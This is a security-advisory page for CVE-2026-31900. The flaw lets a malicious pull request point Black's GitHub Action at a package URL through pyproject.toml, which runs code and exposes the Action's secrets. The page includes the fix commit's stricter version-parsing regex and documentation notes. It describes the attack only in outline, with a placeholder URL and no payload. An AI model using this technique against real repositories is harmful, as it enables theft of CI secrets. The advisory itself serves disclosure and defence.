VYPR
← All advisories
High severityNVD Advisory· Published Mar 11, 2026· Updated Mar 13, 2026

Black's vulnerable version parsing leads to RCE in GitHub Action

CVE-2026-31900

Description

Black is the uncompromising Python code formatter. Black provides a GitHub action for formatting code. This action supports an option, use_pyproject: true, for reading the version of Black to use from the repository pyproject.toml. A malicious pull request could edit pyproject.toml to use a direct URL reference to a malicious repository. This could lead to arbitrary code execution in the context of the GitHub Action. Attackers could then gain access to secrets or permissions available in the context of the action. Version 26.3.0 fixes this vulnerability.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Black's GitHub Action allowed arbitrary code execution via malicious pyproject.toml in pull requests; fixed in version 26.3.0.

Vulnerability

Black, the Python code formatter, provides a GitHub Action that supports the use_pyproject: true option to read the Black version from the repository's pyproject.toml file. The version parsing logic did not sufficiently validate input, allowing a malicious pull request to inject a direct URL reference (e.g., black @ https://...) instead of a version specifier. This flaw could lead to arbitrary code execution within the GitHub Action runner [1][4].

Exploitation

An attacker submits a pull request that modifies pyproject.toml to include a direct URL to a malicious repository. When the GitHub Action processes this file, it installs the attacker-controlled package, executing arbitrary code in the context of the action. No additional authentication is required beyond triggering the action on the pull request [1][4].

Impact

Successful exploitation grants the attacker access to secrets and permissions available to the GitHub Action, such as repository secrets or cloud credentials. This could lead to compromise of the repository or connected services [1][4].

Mitigation

Version 26.3.0 of Black fixes the issue by hardening the version parsing to reject direct references; only standard version specifiers (e.g., ==, >=) are accepted [3]. Users who reference the action as psf/black@stable will automatically receive the update. As a workaround, avoid using use_pyproject: true when workflows run on untrusted pull requests [4].

References
  1. NVD - CVE-2026-31900
  2. Harden Black action version parsing (#5031) · psf/black@0a2560b
  3. Vulnerable version parsing leads to RCE in GitHub Action

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
psf/blackGitHub Actions
< 26.3.026.3.0

Affected products

2
  • Black/Blackllm-fuzzy
    Range: <26.3.0
  • psf/blackv5
    Range: < 26.3.0

Patches

1
0a2560b98136

Harden Black action version parsing (#5031)

https://github.com/psf/blackJelle ZijlstraMar 6, 2026via ghsa
commit
3 files changed · +17 1
  • action/main.py+5 1 modified
    @@ -17,7 +17,11 @@
 USE_PYPROJECT = os.getenv("INPUT_USE_PYPROJECT") == "true"
 OUTPUT_FILE = os.getenv("OUTPUT_FILE", default="")
 
-BLACK_VERSION_RE = re.compile(r"^black([^A-Z0-9._-]+.*)$", re.IGNORECASE)
+BLACK_VERSION_RE = re.compile(
+    r"^black((?:\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)"
+    r"(?:\s*,\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)*)\s*$",
+    re.IGNORECASE,
+)
 EXTRAS_RE = re.compile(r"\[.*\]")
 EXPORT_SUBST_FAIL_RE = re.compile(r"\$Format:.*\$")
  • CHANGES.md+7 0 modified
    @@ -68,6 +68,13 @@
 
 <!-- For example, Docker, GitHub Actions, pre-commit, editors -->
 
+- Harden parsing of `black` requirements in the GitHub Action when `use_pyproject` is
+  enabled so that only version specifiers are accepted and direct references such as
+  `black @ https://...` are rejected. Users should upgrade to the latest version of the
+  action as soon as possible. This update is received automatically when using
+  `psf/black@stable`, and is independent of the version of Black installed by the
+  action. (#5031)
+
 ### Documentation
 
 <!-- Major changes to documentation and policies. Small docs changes
  • docs/integrations/github_actions.md+5 0 modified
    @@ -59,6 +59,11 @@ To read the version from the `pyproject.toml` file instead, set `use_pyproject`
 `project.optional-dependencies` table. Note that this requires Python >= 3.11, so using
 the setup-python action may be required, for example:
 
+**Security note:** `use_pyproject` only accepts standard version specifiers for `black`
+(for example `==`, `~=`, `>=` and ranges like `>=25,<26`). Direct references such as
+`black @ https://...` are not supported. If your workflow runs on untrusted pull
+requests (for example from forks), prefer setting `with.version` explicitly.
+
 ```yaml
 - uses: actions/setup-python@v6
   with:

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.